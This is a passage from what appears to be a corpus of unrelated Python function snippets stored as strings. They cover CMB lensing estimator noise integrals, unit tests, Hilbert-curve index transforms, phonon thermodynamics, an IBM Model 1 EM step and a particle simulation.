np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_put_nveto_pmt_item(self):\n pass", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def prove_I0() -> Proof:\n # Task 4.8", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def test_get_nveto_pmt_item(self):\n pass", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = 